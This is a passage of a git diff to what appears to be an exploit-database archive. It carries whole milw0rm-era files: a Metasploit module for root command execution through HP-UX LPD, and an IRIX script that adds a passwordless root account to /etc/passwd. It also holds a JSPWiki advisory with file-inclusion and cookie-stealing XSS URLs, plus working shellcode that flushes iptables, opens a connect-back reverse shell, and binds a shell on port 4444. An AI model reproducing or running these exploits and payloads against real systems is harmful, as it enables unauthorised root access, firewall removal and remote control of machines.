+ $l->close; + return; +} + +# milw0rm.com [2005-10-19] diff --git a/platforms/hp-ux/remote/1261.pm b/platforms/hp-ux/remote/1261.pm index 285b2af92..5ecd8b3e8 100755 --- a/platforms/hp-ux/remote/1261.pm +++ b/platforms/hp-ux/remote/1261.pm @@ -1,108 +1,108 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::hpux_lpd_exec; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'HP-UX LPD Command Execution', - 'Version' => '$Revision: 1.13 $', - 'Authors' => [ 'H D Moore '], - 'Arch' => [ ], - 'OS' => [ 'hpux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The LPD server port', 515], - }, - 'Payload' => - { - 'Space' => 200, - 'Keys' => ['cmd_nospaceslash'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploit abuses an unpublished vulnerability in the HP-UX LPD - service. This flaw allows an unauthenticated attacker to execute - arbitrary commands with the privileges of the root user. The LPD - service is only exploitable when the address of the attacking system - can be resolved by the target. This vulnerability was silently patched - with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. -}), - 'Refs' => [ - ['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'] - ], - - 'Keys' => ['lpd'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_path = $self->GetVar('RPATH'); - my $cmd = $self->GetVar('EncodedPayload')->RawPayload; - - my $res; - - # We use a second connection to exploit the bug - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - srand(time() + $$); - my $num = int(rand() * 1000); - - $s->Send("\x02msf$num`$cmd`\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our second job request command"); - $s->Close; - return; - } - - $s->Send("\x02 32 cfA187control\n"); - $res = $s->Recv(1, 5); - if (ord($res) != 0) { - $self->PrintLine("[*] The target did not accept our control file"); - $s->Close; - return; - } - - $self->PrintLine("[*] Remember to kill the telnet process when finished"); - $self->PrintLine("[*] Forcing an error and hijacking the cleanup routine..."); - $s->Send(Pex::Text::AlphaNumText(16384)); - $s->Close; - - return; -} - -# milw0rm.com [2005-10-19] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::hpux_lpd_exec; +use base "Msf::Exploit"; +use IO::Socket; +use IO::Select; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'HP-UX LPD Command Execution', + 'Version' => '$Revision: 1.13 $', + 'Authors' => [ 'H D Moore '], + 'Arch' => [ ], + 'OS' => [ 'hpux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The LPD server port', 515], + }, + 'Payload' => + { + 'Space' => 200, + 'Keys' => ['cmd_nospaceslash'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploit abuses an unpublished vulnerability in the HP-UX LPD + service. This flaw allows an unauthenticated attacker to execute + arbitrary commands with the privileges of the root user. The LPD + service is only exploitable when the address of the attacking system + can be resolved by the target. This vulnerability was silently patched + with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213. +}), + 'Refs' => [ + ['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'] + ], + + 'Keys' => ['lpd'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_path = $self->GetVar('RPATH'); + my $cmd = $self->GetVar('EncodedPayload')->RawPayload; + + my $res; + + # We use a second connection to exploit the bug + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + srand(time() + $$); + my $num = int(rand() * 1000); + + $s->Send("\x02msf$num`$cmd`\n"); + $res = $s->Recv(1, 5); + if (ord($res) != 0) { + $self->PrintLine("[*] The target did not accept our second job request command"); + $s->Close; + return; + } + + $s->Send("\x02 32 cfA187control\n"); + $res = $s->Recv(1, 5); + if (ord($res) != 0) { + $self->PrintLine("[*] The target did not accept our control file"); + $s->Close; + return; + } + + $self->PrintLine("[*] Remember to kill the telnet process when finished"); + $self->PrintLine("[*] Forcing an error and hijacking the cleanup routine..."); + $s->Send(Pex::Text::AlphaNumText(16384)); + $s->Close; + + return; +} + +# milw0rm.com [2005-10-19] diff --git a/platforms/hp-ux/remote/977.c b/platforms/hp-ux/remote/977.c index 22267fd89..5bc093e85 100755 --- a/platforms/hp-ux/remote/977.c +++ b/platforms/hp-ux/remote/977.c @@ -92,6 +92,6 @@ if(check != NULL) { printf("Got root hash\n"); } -} - -// milw0rm.com [2005-05-03] +} + +// milw0rm.com [2005-05-03] diff --git a/platforms/hp-ux/shellcode/13295.txt b/platforms/hp-ux/shellcode/13295.txt index f58b0798d..6474d3b46 100755 --- a/platforms/hp-ux/shellcode/13295.txt +++ b/platforms/hp-ux/shellcode/13295.txt @@ -7,6 +7,6 @@ u_char shellcode[] = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe" - "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; - + "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff"; + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/irix/local/1577.sh b/platforms/irix/local/1577.sh index 89acb2423..e0167fded 100755 --- a/platforms/irix/local/1577.sh +++ b/platforms/irix/local/1577.sh @@ -1,10 +1,10 @@ -#!/bin/sh -# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312 - -/usr/sysadm/bin/runpriv mountfs -s test -d / -o | - "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" -su r00t -c "chown root:sys /tmp/passwd123 ; -mv /tmp/passwd123 /etc/passwd ; -chmod 644 /etc/passwd ; su" - -# milw0rm.com [2005-10-10] +#!/bin/sh +# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312 + +/usr/sysadm/bin/runpriv mountfs -s test -d / -o | + "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" +su r00t -c "chown root:sys /tmp/passwd123 ; +mv /tmp/passwd123 /etc/passwd ; +chmod 644 /etc/passwd ; su" + +# milw0rm.com [2005-10-10] diff --git a/platforms/irix/local/265.sh b/platforms/irix/local/265.sh index 70a14fd9b..4fddd82ef 100755 --- a/platforms/irix/local/265.sh +++ b/platforms/irix/local/265.sh @@ -37,6 +37,6 @@ if [ ! -f "$LIBRARY.so" ] fi chmod 666 $LIBRARY.so -$EXECUTABLE -n ../../../../../$DIRECTORY/$FILE - -# milw0rm.com [2001-05-07] +$EXECUTABLE -n ../../../../../$DIRECTORY/$FILE + +# milw0rm.com [2001-05-07] diff --git a/platforms/irix/local/270.sh b/platforms/irix/local/270.sh index 66c100177..aa9d2fe3b 100755 --- a/platforms/irix/local/270.sh +++ b/platforms/irix/local/270.sh @@ -35,6 +35,6 @@ fi chmod 666 $LIBRARY.so $EXECUTABLE -n ../../../../$DIRECTORY/$LIBRARY -h localhost -p lalala bzz-zz - - -# milw0rm.com [2001-05-08] + + +# milw0rm.com [2001-05-08] diff --git a/platforms/irix/local/334.c b/platforms/irix/local/334.c index fdf78626e..566ba9b41 100755 --- a/platforms/irix/local/334.c +++ b/platforms/irix/local/334.c @@ -210,6 +210,6 @@ main(int argc, char *argv[]) { fflush(stdout); run(buf); -} - -// milw0rm.com [1997-05-25] +} + +// milw0rm.com [1997-05-25] diff --git a/platforms/irix/local/336.c b/platforms/irix/local/336.c index 27af00bf1..49da5e632 100755 --- a/platforms/irix/local/336.c +++ b/platforms/irix/local/336.c @@ -89,6 +89,6 @@ void main(int argc, char **argv) execle("/bin/login", "login", "-h", &buf[1], 0, env); perror("execl failed"); -} - -// milw0rm.com [1997-05-26] +} + +// milw0rm.com [1997-05-26] diff --git a/platforms/irix/local/337.c b/platforms/irix/local/337.c index e6482a211..2e7ce9760 100755 --- a/platforms/irix/local/337.c +++ b/platforms/irix/local/337.c @@ -112,6 +112,6 @@ void main(int argc, char **argv) execle("/usr/sbin/iwsh", "iwsh", "-xrm", &buf[2], 0, env); perror("execl failed"); } - - -// milw0rm.com [1997-05-27] + + +// milw0rm.com [1997-05-27] diff --git a/platforms/jsp/webapps/5112.txt b/platforms/jsp/webapps/5112.txt index 1256b72cd..9f1981cb1 100755 --- a/platforms/jsp/webapps/5112.txt +++ b/platforms/jsp/webapps/5112.txt @@ -1,56 +1,56 @@ -JSPWiki Multiple Vulnerabilities - - -Vendor: -Janne Jalkanen JSPWiki – http://www.jspwiki.org - -Application Description: -From JSPWiki website - “JSPWiki is a feature-rich and extensible WikiWiki engine built around a standart J2EE components (Java, servlets, JSP).” - -Tested versions: -JSPWiki v2.4.104 -JSPWiki v2.5.139 -Earlier versions may also be affected. - -JSPWiki Local .jsp File Inclusion Vulnerability. -An input validation problem exists within JSPWiki which allows to execute (include) arbitrary local .jsp files. An attacker may leverage this issue to execute arbitrary server-side script code on a vulnerable server with the privileges of the web server process. - -Example (including rss.jsp file from the application root directory): -http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss - -Note: page parameter must be an existing page on the server. - -This grants an attacker unauthorized access to sensitive .jsp files on the server and can lead to information disclosure. - -Examples: -http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install -http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig - -The first example disclose sensitive information such as the full path of the application on the server, page (and attachments) storage path, log files and work directory by including the application installation (Install.jsp). -The second example disclose the application security configurations by including the JSPWiki Security Configuration Verifier file (admin/SecurityConfig.jsp). - -In addition, JSPWiki allow users to upload (attach) files to entry pages. An attacker can use the information disclosed by the installation file to upload a malicious .jsp file and locally execute it. -By executing malicious server-side code, an attacker may be able to compromise the server. - - -JSPWiki Cross-Site Scripting Vulnerability. -An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -Example: -http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E - -Original Document: -http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0 - -Download PDF: -http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf - -Credit: -Moshe BA -BugSec LTD. - Security Consulting Company -Tel: +972-3-9622655 -Fax: +972-3-9511433 -Email: Info -at- BugSec -d0t- com -http://www.bugsec.com - -# milw0rm.com [2008-02-13] +JSPWiki Multiple Vulnerabilities + + +Vendor: +Janne Jalkanen JSPWiki – http://www.jspwiki.org + +Application Description: +From JSPWiki website - “JSPWiki is a feature-rich and extensible WikiWiki engine built around a standart J2EE components (Java, servlets, JSP).” + +Tested versions: +JSPWiki v2.4.104 +JSPWiki v2.5.139 +Earlier versions may also be affected. + +JSPWiki Local .jsp File Inclusion Vulnerability. +An input validation problem exists within JSPWiki which allows to execute (include) arbitrary local .jsp files. An attacker may leverage this issue to execute arbitrary server-side script code on a vulnerable server with the privileges of the web server process. + +Example (including rss.jsp file from the application root directory): +http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss + +Note: page parameter must be an existing page on the server. + +This grants an attacker unauthorized access to sensitive .jsp files on the server and can lead to information disclosure. + +Examples: +http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install +http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig + +The first example disclose sensitive information such as the full path of the application on the server, page (and attachments) storage path, log files and work directory by including the application installation (Install.jsp). +The second example disclose the application security configurations by including the JSPWiki Security Configuration Verifier file (admin/SecurityConfig.jsp). + +In addition, JSPWiki allow users to upload (attach) files to entry pages. An attacker can use the information disclosed by the installation file to upload a malicious .jsp file and locally execute it. +By executing malicious server-side code, an attacker may be able to compromise the server. + + +JSPWiki Cross-Site Scripting Vulnerability. +An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. + +Example: +http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +Original Document: +http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0 + +Download PDF: +http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf + +Credit: +Moshe BA +BugSec LTD. - Security Consulting Company +Tel: +972-3-9622655 +Fax: +972-3-9511433 +Email: Info -at- BugSec -d0t- com +http://www.bugsec.com + +# milw0rm.com [2008-02-13] diff --git a/platforms/lin_amd64/shellcode/13296.c b/platforms/lin_amd64/shellcode/13296.c index 114fb7420..cca69989e 100755 --- a/platforms/lin_amd64/shellcode/13296.c +++ b/platforms/lin_amd64/shellcode/13296.c @@ -1,85 +1,85 @@ -/* - -/sbin/iptables -F shellcode for AMD64 (84 bytes) - -By gat3way - - -The code to load the sc[] into an executable mmap()-ed executable page -was shamelessly stolen by hophet (too lazy :)) -Thanks Gustavo C. for the inspiration - x86_64 assembly is fun :) - -# Here is the boring assembly code: -# push /sbin/iptables: - movq $0x73656c626174ffff, %rbx - shr $16, %rbx - push %rbx - movq $0x70692f6e6962732f, %rbx - push %rbx - movq %rsp, %rdi -# push params - movq $0x462dffffffffffff,%rbx - shr $48, %rbx - push %rbx - movq %rsp, %rcx - movq $0x46ffffffffffffff,%rbx - shr $56, %rbx - push %rbx - movq %rsp, %rax - xor %rbx, %rbx - push %rbx - push %rcx - push %rax - movq %rsp,%rsi - movq %rsp,%rdx -# execve - xorq %rax,%rax - mov $0x3b,%al - syscall - - -Hm...pak ne moga da izmislia neshto umno :( - -*/ - - - -#include -#include -#include -#include -#include -#include -#include -#include - - -char sc[]="\x48\xbb\xff\xff" -"\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" -"\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" -"\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" -"\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" -"\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; - -void main() -{ - void (*p)(); - int fd; - - printf("Lenght: %d\n", strlen(sc)); - fd = open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); - if (fd < 0) - err(1, "open"); - - write(fd, sc, strlen(sc)); - if ((lseek(fd, 0L, SEEK_SET)) < 0) - err(1, "lseek"); - - p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); - if (p == (void (*)())MAP_FAILED) - err(1, "mmap"); - p(); - return 0; -} - +/* + +/sbin/iptables -F shellcode for AMD64 (84 bytes) + +By gat3way + + +The code to load the sc[] into an executable mmap()-ed executable page +was shamelessly stolen by hophet (too lazy :)) +Thanks Gustavo C. for the inspiration - x86_64 assembly is fun :) + +# Here is the boring assembly code: +# push /sbin/iptables: + movq $0x73656c626174ffff, %rbx + shr $16, %rbx + push %rbx + movq $0x70692f6e6962732f, %rbx + push %rbx + movq %rsp, %rdi +# push params + movq $0x462dffffffffffff,%rbx + shr $48, %rbx + push %rbx + movq %rsp, %rcx + movq $0x46ffffffffffffff,%rbx + shr $56, %rbx + push %rbx + movq %rsp, %rax + xor %rbx, %rbx + push %rbx + push %rcx + push %rax + movq %rsp,%rsi + movq %rsp,%rdx +# execve + xorq %rax,%rax + mov $0x3b,%al + syscall + + +Hm...pak ne moga da izmislia neshto umno :( + +*/ + + + +#include +#include +#include +#include +#include +#include +#include +#include + + +char sc[]="\x48\xbb\xff\xff" +"\x74\x61\x62\x6c\x65\x73\x48\xc1\xeb\x10\x53\x48\xbb\x2f\x73\x62" +"\x69\x6e\x2f\x69\x70\x53\x48\x89\xe7\x48\xbb\xff\xff\xff\xff\xff" +"\xff\x2d\x46\x48\xc1\xeb\x30\x53\x48\x89\xe1\x48\xbb\xff\xff\xff" +"\xff\xff\xff\xff\x46\x48\xc1\xeb\x38\x53\x48\x89\xe0\x48\x31\xdb" +"\x53\x51\x50\x48\x89\xe6\x48\x89\xe2\x48\x31\xc0\xb0\x3b\x0f\x05"; + +void main() +{ + void (*p)(); + int fd; + + printf("Lenght: %d\n", strlen(sc)); + fd = open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); + if (fd < 0) + err(1, "open"); + + write(fd, sc, strlen(sc)); + if ((lseek(fd, 0L, SEEK_SET)) < 0) + err(1, "lseek"); + + p = (void (*)())mmap(NULL, strlen(sc), PROT_READ|PROT_EXEC, MAP_SHARED, fd, 0); + if (p == (void (*)())MAP_FAILED) + err(1, "mmap"); + p(); + return 0; +} + // milw0rm.com [2008-11-28] \ No newline at end of file diff --git a/platforms/lin_amd64/shellcode/13297.c b/platforms/lin_amd64/shellcode/13297.c index 83eeb5504..fee66f5b6 100755 --- a/platforms/lin_amd64/shellcode/13297.c +++ b/platforms/lin_amd64/shellcode/13297.c @@ -1,125 +1,125 @@ -#include -#include -#include -#include -#include -#include -#include - - -/* - - usual rant here.. this is just a doodle.. i was curious about - the amd64 and since i dont think a simple exec /bin/sh is worth releasing - - i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth - because it contains the bullshit feature that /bin/bash isnt /easily/ noticable - - this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints - - if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode" - - to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability.. - i checked.. its there... i promise" - - im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited - by hand if needed.. (dont forget to invert) - - bpp.etherdyne.net - www.stonedcoder.org - phar[at]stonedcoder[dot]org - -*/ - -char sc_raw[] = -"\x48\x31\xd2" // xor %rdx,%rdx -"\x6a\x01" // pushq $0x1 -"\x5e" // pop %rsi -"\x6a\x02" // pushq $0x2 -"\x5f" // pop %rdi -"\x6a\x29" // pushq $0x29 -"\x58" // pop %rax -"\x0f\x05" // syscall #socket - -"\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this -"\x50" // push %rax -"\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx -"\x11\xff\xfd" -"\x48\xf7\xd1" // not %rcx -"\x51" // push %rcx -"\x48\x89\xe6" // mov %rsp,%rsi -"\x6a\x10" // pushq $0x10 -"\x5a" // pop %rdx -"\x6a\x2a" // pushq $0x2a -"\x58" // pop %rax -"\x0f\x05" // syscall #connect - -"\x6a\x03" // pushq $0x3 -"\x5e" // pop %rsi -//dup_loop: -"\x6a\x21" // pushq $0x21 -"\x58" // pop %rax -"\x48\xff\xce" // dec %rsi -"\x0f\x05" // syscall #dup2 - - -"\x75\xf6" // jne 4004c5 -"\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx -"\x8c\x97\xff" -"\x48\xf7\xd3" // not %rbx -"\x53" // push %rbx -"\x48\x89\xe7" // mov %rsp,%rdi -"\x48\x31\xc0" // xor %rax,%rax -"\x50" // push %rax -"\x57" // push %rdi -"\x48\x89\xe6" // mov %rsp,%rsi -"\x48\x31\xd2" // xor %rdx,%rdx -"\xb0\x3b" // mov $0x3b,%al -"\x0f\x05" // syscall #exec -; - -#define HOSTOFFSET 19 -#define PORTOFFSET 23 - -void scprint(char * foo, int len); -void usage(); - -void (*shellcode)() = sc_raw; - -main(int argc, char *argv[]){ -uint32 host; -uint16 port; - - - if(argc != 3){ //i'll only do so much to save you from stupidity - usage(); - exit(1); - } - - host =~ (int)inet_addr(argv[1]); - - port =~ htons(atoi(argv[2])); - - memcpy(&sc_raw[HOSTOFFSET],&host,4); - memcpy(&sc_raw[PORTOFFSET],&port,2); - scprint(sc_raw,sizeof(sc_raw)); - shellcode(); -} - - -void scprint(char * foo, int len){ -int i; - - printf("char shellcode[]=\""); - for(i = 0; i < len; i++){ - printf("\\x%02x",(char)foo[i]&0xff); - } - printf("\";\n"); - fflush(stdout); -} - -void usage(){ - printf("./%s [] []\n\n"); -} - +#include +#include +#include +#include +#include +#include +#include + + +/* + + usual rant here.. this is just a doodle.. i was curious about + the amd64 and since i dont think a simple exec /bin/sh is worth releasing + + i give you, my amd64 connect-back semi-stealth shellcode.. i say semi-stelth + because it contains the bullshit feature that /bin/bash isnt /easily/ noticable + + this code uses both 32 and 64 bit instructions, and uses only 64 bit kernel entrypoints + + if you might say "but..phar.. linux has 32 bit compatability.. and i can just use existing shellcode" + + to that my answer is "fuck you".. i mean.. "there is actually an option to disable 32bit compatability.. + i checked.. its there... i promise" + + im not entirely sure the C crap below will do what you want.. but the shellcode is good and can be edited + by hand if needed.. (dont forget to invert) + + bpp.etherdyne.net + www.stonedcoder.org + phar[at]stonedcoder[dot]org + +*/ + +char sc_raw[] = +"\x48\x31\xd2" // xor %rdx,%rdx +"\x6a\x01" // pushq $0x1 +"\x5e" // pop %rsi +"\x6a\x02" // pushq $0x2 +"\x5f" // pop %rdi +"\x6a\x29" // pushq $0x29 +"\x58" // pop %rax +"\x0f\x05" // syscall #socket + +"\x48\x97" // xchg %rax,%rdi #in_sockaddr, rax does equal 2 but i think i can get away with this +"\x50" // push %rax +"\x48\xb9\x00\x00\x00\x00\x11" // mov $0x4141414141414141,%rcx +"\x11\xff\xfd" +"\x48\xf7\xd1" // not %rcx +"\x51" // push %rcx +"\x48\x89\xe6" // mov %rsp,%rsi +"\x6a\x10" // pushq $0x10 +"\x5a" // pop %rdx +"\x6a\x2a" // pushq $0x2a +"\x58" // pop %rax +"\x0f\x05" // syscall #connect + +"\x6a\x03" // pushq $0x3 +"\x5e" // pop %rsi +//dup_loop: +"\x6a\x21" // pushq $0x21 +"\x58" // pop %rax +"\x48\xff\xce" // dec %rsi +"\x0f\x05" // syscall #dup2 + + +"\x75\xf6" // jne 4004c5 +"\x48\xbb\xd0\x9d\x96\x91\xd0" // mov $0xff978cd091969dd0,%rbx +"\x8c\x97\xff" +"\x48\xf7\xd3" // not %rbx +"\x53" // push %rbx +"\x48\x89\xe7" // mov %rsp,%rdi +"\x48\x31\xc0" // xor %rax,%rax +"\x50" // push %rax +"\x57" // push %rdi +"\x48\x89\xe6" // mov %rsp,%rsi +"\x48\x31\xd2" // xor %rdx,%rdx +"\xb0\x3b" // mov $0x3b,%al +"\x0f\x05" // syscall #exec +; + +#define HOSTOFFSET 19 +#define PORTOFFSET 23 + +void scprint(char * foo, int len); +void usage(); + +void (*shellcode)() = sc_raw; + +main(int argc, char *argv[]){ +uint32 host; +uint16 port; + + + if(argc != 3){ //i'll only do so much to save you from stupidity + usage(); + exit(1); + } + + host =~ (int)inet_addr(argv[1]); + + port =~ htons(atoi(argv[2])); + + memcpy(&sc_raw[HOSTOFFSET],&host,4); + memcpy(&sc_raw[PORTOFFSET],&port,2); + scprint(sc_raw,sizeof(sc_raw)); + shellcode(); +} + + +void scprint(char * foo, int len){ +int i; + + printf("char shellcode[]=\""); + for(i = 0; i < len; i++){ + printf("\\x%02x",(char)foo[i]&0xff); + } + printf("\";\n"); + fflush(stdout); +} + +void usage(){ + printf("./%s [] []\n\n"); +} + // milw0rm.com [2006-04-21] \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/13463.c b/platforms/lin_x86-64/shellcode/13463.c index d5154242b..d35aa04ff 100755 --- a/platforms/lin_x86-64/shellcode/13463.c +++ b/platforms/lin_x86-64/shellcode/13463.c @@ -1,90 +1,89 @@ - -/* -linux/x86-64 bindshell(port 4444) -xi4oyu [at] 80sec.com -http://www.80sec.com - - -BITS 64 -xor eax,eax -xor ebx,ebx -xor edx,edx -;socket -mov al,0x1 -mov esi,eax -inc al -mov edi,eax -mov dl,0x6 -mov al,0x29 -syscall -xchg ebx,eax ;store the server sock -;bind -xor rax,rax -push rax -push 0x5c110102 -mov [rsp+1],al -mov rsi,rsp -mov dl,0x10 -mov edi,ebx -mov al,0x31 -syscall -;listen -mov al,0x5 -mov esi,eax -mov edi,ebx -mov al,0x32 -syscall -;accept -xor edx,edx -xor esi,esi -mov edi,ebx -mov al,0x2b -syscall -mov edi,eax ; store sock -;dup2 -xor rax,rax -mov esi,eax -mov al,0x21 -syscall -inc al -mov esi,eax -mov al,0x21 -syscall -inc al -mov esi,eax -mov al,0x21 -syscall -;exec -xor rdx,rdx -mov rbx,0x68732f6e69622fff -shr rbx,0x8 -push rbx -mov rdi,rsp -xor rax,rax -push rax -push rdi -mov rsi,rsp -mov al,0x3b -syscall -push rax -pop rdi -mov al,0x3c -syscall -*/ - -main() { - char shellcode[] = - "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" - "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" - "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" - "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" - "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" - "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" - "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" - "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" - "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; - - (*(void (*)()) shellcode)(); -} - +/* +linux/x86-64 bindshell(port 4444) +xi4oyu [at] 80sec.com +http://www.80sec.com + + +BITS 64 +xor eax,eax +xor ebx,ebx +xor edx,edx +;socket +mov al,0x1 +mov esi,eax +inc al +mov edi,eax +mov dl,0x6 +mov al,0x29 +syscall +xchg ebx,eax ;store the server sock +;bind +xor rax,rax +push rax +push 0x5c110102 +mov [rsp+1],al +mov rsi,rsp +mov dl,0x10 +mov edi,ebx +mov al,0x31 +syscall +;listen +mov al,0x5 +mov esi,eax +mov edi,ebx +mov al,0x32 +syscall +;accept +xor edx,edx +xor esi,esi +mov edi,ebx +mov al,0x2b +syscall +mov edi,eax ; store sock +;dup2 +xor rax,rax +mov esi,eax +mov al,0x21 +syscall +inc al +mov esi,eax +mov al,0x21 +syscall +inc al +mov esi,eax +mov al,0x21 +syscall +;exec +xor rdx,rdx +mov rbx,0x68732f6e69622fff +shr rbx,0x8 +push rbx +mov rdi,rsp +xor rax,rax +push rax +push rdi +mov rsi,rsp +mov al,0x3b +syscall +push rax +pop rdi +mov al,0x3c +syscall +*/ + +main() { + char shellcode[] = + "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" + "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" + "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" + "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" + "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" + "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" + "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" + "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/13464.s b/platforms/lin_x86-64/shellcode/13464.s index 8526526fe..411555859 100755 --- a/platforms/lin_x86-64/shellcode/13464.s +++ b/platforms/lin_x86-64/shellcode/13464.s @@ -1,29 